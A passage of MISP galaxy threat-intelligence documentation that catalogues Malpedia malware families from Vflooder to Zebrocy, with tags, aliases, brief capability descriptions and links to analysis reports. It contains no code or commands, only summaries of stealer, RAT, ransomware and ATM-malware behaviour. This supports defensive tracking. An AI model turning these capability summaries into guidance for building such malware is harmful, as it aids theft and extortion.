Vflooder floods VirusTotal by infinitely submitting a copy of itself. Some variants apparently also try to flood Twitter. The impact on these services are negligible, but for researchers it can be a nuisance. Most versions are protectd by VMProtect.

The tag is: *misp-galaxy:malpedia=*Vflooder*"

Vflooder is also known as:

Table 2710. Table References

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VHD Ransomware

The tag is: `misp-galaxy:malpedia="VHD Ransomware"`

VHD Ransomware is also known as:

Table 2711. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.vhd_ransomware">https://malpedia.caad.fkie.fraunhofer.de/details/win.vhd_ransomware</a></td>
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<tr>
<td><a href="https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/">https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/</a></td>
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<tr>
<td><a href="https://twitter.com/GrujaRS/status/1241657443282825217">https://twitter.com/GrujaRS/status/1241657443282825217</a></td>
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vidar

Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.

The tag is: `misp-galaxy:malpedia="vidar"`

vidar is also known as:

Table 2712. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar">https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar</a></td>
<td></td>
</tr>
<tr>
<td><a href="https://tccontre.blogspot.com/2019/03/infor-stealer-vidar-trojanspy-analysis.html">https://tccontre.blogspot.com/2019/03/infor-stealer-vidar-trojanspy-analysis.html</a></td>
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virdetdoor

The tag is: `misp-galaxy:malpedia="virdetdoor"`

virdetdoor is also known as:

Table 2713. Table References

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### Virut

The tag is: `misp-galaxy:malpedia="Virut"

Virut is also known as:

*Table 2714. Table References*

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<tr>
<td><a href="https://krebsonsecurity.com/2013/01/polish-takedown-targets-virut-botnet/">https://krebsonsecurity.com/2013/01/polish-takedown-targets-virut-botnet/</a></td>
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<td><a href="https://chrisdietri.ch/post/virut-resurrects/">https://chrisdietri.ch/post/virut-resurrects/</a></td>
</tr>
<tr>
<td><a href="https://www.secureworks.com/research/virut-encryption-analysis">https://www.secureworks.com/research/virut-encryption-analysis</a></td>
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<tr>
<td><a href="https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/">https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/</a></td>
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### Vizom

The tag is: `misp-galaxy:malpedia="Vizom"

Vizom is also known as:

*Table 2715. Table References*

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### VM Zeus

The tag is: `misp-galaxy:malpedia="VM Zeus"

VM Zeus is also known as:

- VMzeus
- Zberp
- ZeusVM
### Vobfus

The tag is: `misp-galaxy:malpedia="Vobfus"`

Vobfus is also known as:

- **Beebone**

### Void Ransomware

The tag is: `misp-galaxy:malpedia="Void Ransomware"`

Void Ransomware is also known as:

- **VoidCrypt Ransomware**

### Volgmer

The tag is: `misp-galaxy:malpedia="Volgmer"`

Volgmer is also known as:

- **FALLCHILL**
• Manuscrypt

Table 2719. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.volmer">https://malpedia.caad.fkie.fraunhofer.de/details/win.volmer</a></td>
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<td><a href="https://www.us-cert.gov/ncas/alerts/TA17-318B">https://www.us-cert.gov/ncas/alerts/TA17-318B</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/nickel-academy">https://www.secureworks.com/research/threat-profiles/nickel-academy</a></td>
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<td><a href="https://medium.com/s2wlab/analysis-of-threatneedle-c-c-communication-feat-google-tag-warning-to-researchers-782aa51cf74">https://medium.com/s2wlab/analysis-of-threatneedle-c-c-communication-feat-google-tag-warning-to-researchers-782aa51cf74</a></td>
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<td><a href="https://securelist.com/operation-applejeus/87553/">https://securelist.com/operation-applejeus/87553/</a></td>
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<td><a href="https://securelist.com/lazarus-threatneedle/100803/">https://securelist.com/lazarus-threatneedle/100803/</a></td>
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Vovalex

Ransomware written in D.

The tag is: *misp-galaxy:malpedia="Vovalex"

Vovalex is also known as:

Table 2720. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.vovalex">https://malpedia.caad.fkie.fraunhofer.de/details/win.vovalex</a></td>
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<td><a href="https://twitter.com/VK_Intel/status/1355196321964109824">https://twitter.com/VK_Intel/status/1355196321964109824</a></td>
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<td><a href="https://twitter.com/malware_traffic/status/1351808079164276736">https://twitter.com/malware_traffic/status/1351808079164276736</a></td>
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Vreikstadi

The tag is: *misp-galaxy:malpedia="Vreikstadi"

Vreikstadi is also known as:

Table 2721. Table References

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<td><a href="https://twitter.com/malwrhunterteam/status/821483557990318080">https://twitter.com/malwrhunterteam/status/821483557990318080</a></td>
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vSkimmer

The tag is: misp-galaxy:malpedia="vSkimmer"

vSkimmer is also known as:

Table 2722. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.vskimmer">https://malpedia.caad.fkie.fraunhofer.de/details/win.vskimmer</a></td>
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<td><a href="http://www.xylibox.com/2013/01/vskimmer.html">http://www.xylibox.com/2013/01/vskimmer.html</a></td>
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<td><a href="https://securingtomorrow.mcafee.com/mcafee-labs/vskimmer-botnet-targets-credit-card-payment-terminals/">https://securingtomorrow.mcafee.com/mcafee-labs/vskimmer-botnet-targets-credit-card-payment-terminals/</a></td>
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w32times

The tag is: misp-galaxy:malpedia="w32times"

w32times is also known as:

Table 2723. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.w32times">https://malpedia.caad.fkie.fraunhofer.de/details/win.w32times</a></td>
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<tr>
<td><a href="https://attack.mitre.org/wiki/Group/G0022">https://attack.mitre.org/wiki/Group/G0022</a></td>
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</table>

win.wabot

Wabot is an IRC worm that is written in Delphi.

The tag is: misp-galaxy:malpedia="win.wabot"

win.wabot is also known as:

Table 2724. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.wabot">https://malpedia.caad.fkie.fraunhofer.de/details/win.wabot</a></td>
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<td><a href="https://blog.talosintelligence.com/2017/03/threat-roundup-0324-0331.html">https://blog.talosintelligence.com/2017/03/threat-roundup-0324-0331.html</a></td>
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WallyShack

The tag is: misp-galaxy:malpedia="WallyShack"

WallyShack is also known as:
WannaCryptor

The tag is: **misp-galaxy:malpedia=“WannaCryptor”**

WannaCryptor is also known as:

- Wana Decrypt0r
- WannaCry
- Wcry

Table 2726. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor">https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor</a></td>
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<td><a href="https://www.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomware-spread/">https://www.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomware-spread/</a></td>
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<td><a href="https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/">https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/</a></td>
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<td><a href="https://www.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomware-spread/">https://www.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomware-spread/</a></td>
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<td><a href="https://metaswan.github.io/posts/Malware-Lazarus-group-s-Brambul-worm-of-the-former-Wannacry-1">https://metaswan.github.io/posts/Malware-Lazarus-group-s-Brambul-worm-of-the-former-Wannacry-1</a></td>
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<tr>
<td><a href="https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomware-spread/">https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomware-spread/</a></td>
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<tr>
<td><a href="https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58">https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58</a></td>
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<td><a href="https://blog.comae.io/wannacry-new-variants-detected-b8908fefe7e">https://blog.comae.io/wannacry-new-variants-detected-b8908fefe7e</a></td>
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**WannaRen Ransomware**

The tag is: `misp-galaxy:malpedia="WannaRen Ransomware"`

WannaRen Ransomware is also known as:

Table 2727. Table References

Links

- https://malpedia.caad.fkie.fraunhofer.de/details/win.wannaren
- https://id-ransomware.blogspot.com/2020/03/wannaren-ransomware.html

**WastedLocker**

WastedLocker is a ransomware detected to be in use since May 2020 by EvilCorp. The ransomware name is derived from the filename that it creates which includes an abbreviation of the victim’s name and the string ‘wasted’. WastedLocker is protected with a custom crypter, referred to as CryptOne by Fox-IT InTELL. On examination, this crypter turned out to be very basic and was used also by other malware families such as: Netwalker, Gozi ISFB v3, ZLoader and Smokeloader. The crypter mainly contains junk code to increase entropy of the sample and hide the actual code.

The tag is: `misp-galaxy:malpedia="WastedLocker"`

WastedLocker is also known as:
WaterMiner

The tag is: misp-galaxy:malpedia="WaterMiner"

WaterMiner is also known as:

Table 2729. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.waterminer">https://malpedia.caad.fkie.fraunhofer.de/details/win.waterminer</a></td>
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<td><a href="https://blog.minerva-labs.com/waterminer-a-new-evasive-crypto-miner">https://blog.minerva-labs.com/waterminer-a-new-evasive-crypto-miner</a></td>
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### WaterSpout

The tag is: `misp-galaxy:malpedia="WaterSpout"`

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### WebC2-AdSpace

The tag is: `misp-galaxy:malpedia="WebC2-AdSpace"`

WebC2-AdSpace is also known as:

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### WebC2-Ausov

The tag is: `misp-galaxy:malpedia="WebC2-Ausov"`

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### WebC2-Bolid

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WebC2-Bolid is also known as:

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### WebC2-Cson

The tag is: `misp-galaxy:malpedia="WebC2-Cson"`

WebC2-Cson is also known as:

Table 2734. Table References

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### WebC2-DIV

The tag is: `misp-galaxy:malpedia="WebC2-DIV"`

WebC2-DIV is also known as:

Table 2735. Table References

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### WebC2-GreenCat

The tag is: `misp-galaxy:malpedia="WebC2-GreenCat"`

WebC2-GreenCat is also known as:

Table 2736. Table References

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### WebC2-Head

The tag is: `misp-galaxy:malpedia="WebC2-Head"`
WebC2-Head is also known as:

Table 2737. Table References

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WebC2-Kt3

The tag is: `misp-galaxy:malpedia="WebC2-Kt3"`

WebC2-Kt3 is also known as:

Table 2738. Table References

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WebC2-Qbp

The tag is: `misp-galaxy:malpedia="WebC2-Qbp"`

WebC2-Qbp is also known as:

Table 2739. Table References

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WebC2-Rave

The tag is: `misp-galaxy:malpedia="WebC2-Rave"`

WebC2-Rave is also known as:

Table 2740. Table References

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WebC2-Table

The tag is: misp-galaxy:malpedia="WebC2-Table"

WebC2-Table is also known as:

Table 2741. Table References

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WebC2-UGX

The tag is: misp-galaxy:malpedia="WebC2-UGX"

WebC2-UGX is also known as:

Table 2742. Table References

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</table>

WebC2-Yahoo

The tag is: misp-galaxy:malpedia="WebC2-Yahoo"

WebC2-Yahoo is also known as:

Table 2743. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_yahoo">https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_yahoo</a></td>
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</table>

WebMonitor RAT

On its website, Webmonitor RAT is described as 'a very powerful, user-friendly, easy-to-setup and state-of-the-art monitoring tool. Webmonitor is a fully native RAT, meaning it will run on all Windows versions and languages starting from Windows XP and up, and perfectly compatible with all crypters and protectors.' Unit42 notes in their analysis that it is offered as C2-as-a-service and raises the controversial aspect that the builder allows to create client binaries that will not show any popup or dialogue during installation or while running on a target system.
The tag is: misp-galaxy:malpedia="WebMonitor RAT"

WebMonitor RAT is also known as:

- RevCode

**Table 2744. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor">https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor</a></td>
</tr>
<tr>
<td><a href="https://revcode.se/product/webmonitor/">https://revcode.se/product/webmonitor/</a></td>
</tr>
</tbody>
</table>

**WellMess**

WellMess is A Remote Access Trojan written in GoLang and .NET. It has hard-coded User-Agents. Attackers deploy WellMess using separate tools which also allow lateral movement, for example "gost". Command and Control traffic is handled via HTTP using the Set-Cookie field and message body.

The tag is: misp-galaxy:malpedia="WellMess"

WellMess is also known as:

**Table 2745. Table References**

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.wellmess">https://malpedia.caad.fkie.fraunhofer.de/details/win.wellmess</a></td>
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<tr>
<td><a href="https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b">https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b</a></td>
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<tr>
<td><a href="https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html">https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html</a></td>
</tr>
</tbody>
</table>
WhiteBird

According to Dr.Web, WhiteBird is a backdoor written in C++ and designed to operate in both 32-bit and 64-bit Microsoft Windows operating systems. The configuration is encrypted with a single byte XOR key. An interesting feature is that the malware can be restricted to operate only within certain "working_hours" with a granularity of one minute.

The tag is: `misp-galaxy:malpedia="WhiteBird"

WhiteBird is also known as:

WildFire

The tag is: `misp-galaxy:malpedia="WildFire"

WildFire is also known as:

winlog

The tag is: `misp-galaxy:malpedia="winlog"

winlog is also known as:
WinMM

The tag is: misp-galaxy:malpedia="WinMM"

WinMM is also known as:

Table 2749. Table References

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<tr>
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</tr>
<tr>
<td><a href="https://securelist.com/analysis/publications/69953/the-naikon-apt/">https://securelist.com/analysis/publications/69953/the-naikon-apt/</a></td>
</tr>
<tr>
<td><a href="https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf</a></td>
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</table>

Winnti (Windows)

The tag is: misp-galaxy:malpedia="Winnti (Windows)"

Winnti (Windows) is also known as:

- BleDoor
- JUMPALL
- Pasteboy
- RbDoor

Table 2750. Table References

<table>
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<tr>
<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti">https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti</a></td>
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<tr>
<td><a href="https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/">https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/</a></td>
</tr>
<tr>
<td><a href="https://quointelligence.eu/2020/04/winnti-group-insights-from-the-past/">https://quointelligence.eu/2020/04/winnti-group-insights-from-the-past/</a></td>
</tr>
<tr>
<td><a href="https://securelist.com/games-are-over/70991/">https://securelist.com/games-are-over/70991/</a></td>
</tr>
<tr>
<td><a href="https://github.com/TKCERT/winnti-suricata-lua">https://github.com/TKCERT/winnti-suricata-lua</a></td>
</tr>
</tbody>
</table>
WinPot

WinPot is created to make ATMs by a popular ATM vendor to automatically dispense all cash from their most valuable cassettes.

The tag is: *misp-galaxy:malpedia*="WinPot"
WinPot is also known as:

- ATMPot

Table 2751. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.winpot">https://malpedia.caad.fkie.fraunhofer.de/details/win.winpot</a></td>
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<td><a href="https://securelist.com/atm-robber-winpot/89611/">https://securelist.com/atm-robber-winpot/89611/</a></td>
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**Winsloader**

The tag is: *misp-galaxy:malpedia="Winsloader"*

Winsloader is also known as:

Table 2752. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.winsloader">https://malpedia.caad.fkie.fraunhofer.de/details/win.winsloader</a></td>
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**Wipbot**

The tag is: *misp-galaxy:malpedia="Wipbot"*

Wipbot is also known as:

Table 2753. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot">https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot</a></td>
</tr>
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</table>

**WMI Ghost**

The tag is: *misp-galaxy:malpedia="WMI Ghost"*
WMI Ghost is also known as:

- Syndicasec
- Wimmie

Table 2754. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.wmighost">https://malpedia.caad.fkie.fraunhofer.de/details/win.wmighost</a></td>
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<td><a href="https://secrary.com/ReversingMalware/WMIGhost/">https://secrary.com/ReversingMalware/WMIGhost/</a></td>
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<td><a href="https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets">https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets</a></td>
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WndTest

The tag is: `misp-galaxy:malpedia="WndTest"`

WndTest is also known as:

Table 2755. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.wndtest">https://malpedia.caad.fkie.fraunhofer.de/details/win.wndtest</a></td>
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Wonknu

The tag is: `misp-galaxy:malpedia="Wonknu"`

Wonknu is also known as:

Table 2756. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.wonknu">https://malpedia.caad.fkie.fraunhofer.de/details/win.wonknu</a></td>
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woody

The tag is: `misp-galaxy:malpedia="woody"`

woody is also known as:

Table 2757. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.woody">https://malpedia.caad.fkie.fraunhofer.de/details/win.woody</a></td>
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Woolger

The tag is: misp-galaxy:malpedia="Woolger"

Woolger is also known as:

- WoolenLogger

Table 2758. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.woolger">https://malpedia.caad.fkie.fraunhofer.de/details/win.woolger</a></td>
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WORMHOLE

WORMHOLE is a TCP tunneler that is dynamically configurable from a C&C server and can communicate with an additional remote machine endpoint for a relay.

The tag is: misp-galaxy:malpedia="WORMHOLE"

WORMHOLE is also known as:

Table 2759. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.wormhole">https://malpedia.caad.fkie.fraunhofer.de/details/win.wormhole</a></td>
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<tr>
<td><a href="https://content.fireeye.com/apt/rpt-apt38">https://content.fireeye.com/apt/rpt-apt38</a></td>
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WormLocker

The tag is: misp-galaxy:malpedia="WormLocker"

WormLocker is also known as:

- WormLckr

Table 2760. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.wormlocker">https://malpedia.caad.fkie.fraunhofer.de/details/win.wormlocker</a></td>
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WpBruteBot

The tag is: `misp-galaxy:malpedia="WpBruteBot"`

WpBruteBot is also known as:

Table 2761. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.wpbrutebot">https://malpedia.caad.fkie.fraunhofer.de/details/win.wpbrutebot</a></td>
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WSCSPL

The tag is: `misp-galaxy:malpedia="WSCSPL"`

WSCSPL is also known as:

Table 2762. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.wscspl">https://malpedia.caad.fkie.fraunhofer.de/details/win.wscspl</a></td>
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x4

The tag is: `misp-galaxy:malpedia="x4"`

x4 is also known as:

Table 2763. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.x4">https://malpedia.caad.fkie.fraunhofer.de/details/win.x4</a></td>
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</table>

X-Agent (Windows)

The tag is: `misp-galaxy:malpedia="X-Agent (Windows)"`

X-Agent (Windows) is also known as:

- chopstick
### Table 2764. Table References

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<tr>
<td><a href="https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/">https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/iron-twilight">https://www.secureworks.com/research/threat-profiles/iron-twilight</a></td>
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</table>

**XBot POS**

The tag is: _misp-galaxy:malpedia="XBot POS"_

XBot POS is also known as:

### Table 2765. Table References

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**XBTL**

The tag is: _misp-galaxy:malpedia="XBTL"_

XBTL is also known as:

### Table 2766. Table References

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XDSpy

According to ESET Research, XDDown is a primary malware component and is strictly a downloader. It persists on the system using the traditional Run key. It downloads additional plugins from the hardcoded C&C server using the HTTP protocol. The HTTP replies contain PE binaries encrypted with a hardcoded two-byte XOR key. Plugins include a module for reconnaissance on the affected system, crawling drives, file exfiltration, SSID gathering, and grabbing saved passwords.

The tag is: misp-galaxy:malpedia="XDSpy"

XDSpy is also known as:

Table 2767. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.xdspy">https://malpedia.caad.fkie.fraunhofer.de/details/win.xdspy</a></td>
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<td><a href="https://github.com/eset/malware-ioc/tree/master/xdspy/">https://github.com/eset/malware-ioc/tree/master/xdspy/</a></td>
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Xenon Stealer

The tag is: misp-galaxy:malpedia="Xenon Stealer"

Xenon Stealer is also known as:

Table 2768. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.xenon">https://malpedia.caad.fkie.fraunhofer.de/details/win.xenon</a></td>
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<td><a href="https://twitter.com/3xp0rtnblog/status/1331974232192987142">https://twitter.com/3xp0rtnblog/status/1331974232192987142</a></td>
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XFSADM

The tag is: misp-galaxy:malpedia="XFSADM"

XFSADM is also known as:

Table 2769. Table References

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**XFSCashNCR**

The tag is: `misp-galaxy:malpedia="XFSCashNCR"`

XFSCashNCR is also known as:

*Table 2770. Table References*

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<td><a href="https://twitter.com/r3c0nst/status/1166773324548063232">https://twitter.com/r3c0nst/status/1166773324548063232</a></td>
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**XiaoBa Ransomware**

The tag is: `misp-galaxy:malpedia="XiaoBa Ransomware"`

XiaoBa Ransomware is also known as:

- FlyStudio Ransomware

*Table 2771. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.xiaoba">https://malpedia.caad.fkie.fraunhofer.de/details/win.xiaoba</a></td>
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<tr>
<td><a href="https://id-ransomware.blogspot.com/2017/10/xiaoba-ransomware.html">https://id-ransomware.blogspot.com/2017/10/xiaoba-ransomware.html</a></td>
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</table>

**XP10 Ransomware**

The tag is: `misp-galaxy:malpedia="XP10 Ransomware"`

XP10 Ransomware is also known as:

- FakeChrome Ransomware

*Table 2772. Table References*

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**Xpan**

The tag is: `misp-galaxy:malpedia="Xpan"`

Xpan is also known as:
XPCTRA

Incorporates code of Quasar RAT.

The tag is: `misp-galaxy:malpedia="XPCTRA"`

XPCTRA is also known as:

- Expectra

XpertRAT

The tag is: `misp-galaxy:malpedia="XpertRAT"`

XpertRAT is also known as:

XP PrivEsc (CVE-2014-4076)

The tag is: `misp-galaxy:malpedia="XP PrivEsc (CVE-2014-4076)"`

XP PrivEsc (CVE-2014-4076) is also known as:
XServer

The tag is: **misp-galaxy:malpedia="XServer"**

XServer is also known as:

- Filenfer

Table 2777. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.xserver">https://malpedia.caad.fkie.fraunhofer.de/details/win.xserver</a></td>
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<tr>
<td><a href="https://norfolkinfosec.com/filesnfer-tool-c-python/">https://norfolkinfosec.com/filesnfer-tool-c-python/</a></td>
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xsPlus

The tag is: **misp-galaxy:malpedia="xsPlus"**

xsPlus is also known as:

- nokian

Table 2778. Table References

<table>
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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus">https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus</a></td>
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<td><a href="https://securelist.com/analysis/publications/69953/the-naikon-apt/">https://securelist.com/analysis/publications/69953/the-naikon-apt/</a></td>
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<tr>
<td><a href="https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf</a></td>
</tr>
</tbody>
</table>

XTunnel

X-Tunnel is a network proxy tool that implements a custom network protocol encapsulated in the TLS protocol.

The tag is: **misp-galaxy:malpedia="XTunnel"**

XTunnel is also known as:
X-Tunnel (.NET)

This is a rewrite of win.xtunnel using the .NET framework that surfaced late 2017.

The tag is: *misp-galaxy:malpedia=*"X-Tunnel (.NET)"

X-Tunnel (.NET) is also known as:

Table 2780. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel_net">https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel_net</a></td>
</tr>
<tr>
<td><a href="https://www.ncsc.gov.uk/alerts/indicators-compromise-malware-used-apt28">https://www.ncsc.gov.uk/alerts/indicators-compromise-malware-used-apt28</a></td>
</tr>
</tbody>
</table>

Xwo

In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it “Xwo” - taken
from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.

The tag is: `misp-galaxy:malpedia="Xwo"`

**Xwo** is also known as:

*Table 2781. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.xwo">https://malpedia.caad.fkie.fraunhofer.de/details/win.xwo</a></td>
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</table>

**xxmm**

The tag is: `misp-galaxy:malpedia="xxmm"`

**xxmm** is also known as:

- ShadowWalker

*Table 2782. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm">https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses">https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses</a></td>
</tr>
<tr>
<td><a href="https://www.macnica.net/mpressioncss/feature_05.html/">https://www.macnica.net/mpressioncss/feature_05.html/</a></td>
</tr>
<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-butler">https://www.secureworks.com/research/threat-profiles/bronze-butler</a></td>
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</table>

**Yahoyah**

The tag is: `misp-galaxy:malpedia="Yahoyah"`

**Yahoyah** is also known as:

- KeyBoy

*Table 2783. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.yahoyah">https://malpedia.caad.fkie.fraunhofer.de/details/win.yahoyah</a></td>
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</table>
Yakuza Ransomware

The tag is: misp-galaxy:malpedia="Yakuza Ransomware"

Yakuza Ransomware is also known as:

- Teslarvng Ransomware

Table 2784. Table References

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</tbody>
</table>

Yarraq Ransomware

Yarraq is a ransomware that encrypts files by using asymmetric keys and adding '.yarraq' as extension to the end of filenames. At the time of writing the attacker asks for $2000 ransom in order to provide a decryptor, to enable victims to restore their original files back. To communicate with the attacker the email: cyborgyarraq@protonmail.ch is provided.

The tag is: misp-galaxy:malpedia="Yarraq Ransomware"

Yarraq Ransomware is also known as:

Table 2785. Table References

<table>
<thead>
<tr>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.yarraq">https://malpedia.caad.fkie.fraunhofer.de/details/win.yarraq</a></td>
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<td><a href="https://yomi.yoroi.company/report/5e1d7b06c21640608183de58/5e1d7b09d1cc4993da62f261/overview">https://yomi.yoroi.company/report/5e1d7b06c21640608183de58/5e1d7b09d1cc4993da62f261/overview</a></td>
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</tr>
<tr>
<td><a href="https://twitter.com/GrujaRS/status/1210541690349662209">https://twitter.com/GrujaRS/status/1210541690349662209</a></td>
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Yatron

The tag is: misp-galaxy:malpedia="Yatron"

Yatron is also known as:

Table 2786. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.yatron">https://malpedia.caad.fkie.fraunhofer.de/details/win.yatron</a></td>
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</table>
**yayih**

The tag is: `misp-galaxy:malpedia="yayih"`

yayih is also known as:

- aumlib
- bbsinfo

*Table 2787. Table References*

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.yayih">https://malpedia.caad.fkie.fraunhofer.de/details/win.yayih</a></td>
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**Yellow Cockatoo RAT**

The tag is: `misp-galaxy:malpedia="Yellow Cockatoo RAT"`

Yellow Cockatoo RAT is also known as:

- Polazer

*Table 2788. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.yellow_cockatoo">https://malpedia.caad.fkie.fraunhofer.de/details/win.yellow_cockatoo</a></td>
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<tr>
<td><a href="https://redcanary.com/blog/yellow-cockatoo/">https://redcanary.com/blog/yellow-cockatoo/</a></td>
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**Yoddos**

The tag is: `misp-galaxy:malpedia="Yoddos"`

Yoddos is also known as:

*Table 2789. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.yoddos">https://malpedia.caad.fkie.fraunhofer.de/details/win.yoddos</a></td>
</tr>
</tbody>
</table>

**YoungLotus**

Simple malware with proxy/RDP and download capabilities. It often comes bundled with installers, in particular in the Chinese realm.
PE timestamps suggest that it came into existence in the second half of 2014.

Some versions perform checks of the status of the internet connection (InternetGetConnectedState: MODEM, LAN, PROXY), some versions perform simple AV process-checks (CreateToolhelp32Snapshot).

The tag is: misp-galaxy:malpedia="YoungLotus"

YoungLotus is also known as:

- DarkShare

Table 2790. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.younglotus">https://malpedia.caad.fkie.fraunhofer.de/details/win.younglotus</a></td>
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<tr>
<td><a href="https://www.youtube.com/watch?v=AUGxYhE_CUY">https://www.youtube.com/watch?v=AUGxYhE_CUY</a></td>
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yty

The tag is: misp-galaxy:malpedia="yty"

yty is also known as:

Table 2791. Table References

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<td><a href="https://www.secureworks.com/research/threat-profiles/zinc-emerson">https://www.secureworks.com/research/threat-profiles/zinc-emerson</a></td>
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Z3 Ransomware

The tag is: misp-galaxy:malpedia="Z3 Ransomware"

Z3 Ransomware is also known as:

- Z3enc Ransomware

Table 2792. Table References

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</table>
Zacinlo

Bitdefender describes the primary features of the family as follows: Presence of a rootkit driver that protects itself as well as its other components, presence of man-in-the-browser capabilities that intercepts and decrypts SSL communications, and presence of an adware cleanup routine used to remove potential competition in the adware space. It also communicates with its C&C server, sending environment information such as installed AV and other applications. The malware also takes screenshots and does browser redirects, potentially manipulating the DOM tree. It also creates traffic in hidden windows, likely causing adfraud. The malware is generally very configurable and internally makes use of Lua scripts.

The tag is: `misp-galaxy:malpedia="Zacinlo"`

Zacinlo is also known as:

- s5mark

Table 2793. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.zacinlo">https://malpedia.caad.fkie.fraunhofer.de/details/win.zacinlo</a></td>
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Zebrocy

The tag is: `misp-galaxy:malpedia="Zebrocy"`

Zebrocy is also known as:

- Zekapab

Table 2794. Table References

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Zebrocy (AutoIT)

The tag is: *misp-galaxy:malpedia*="Zebrocy (AutoIT)"

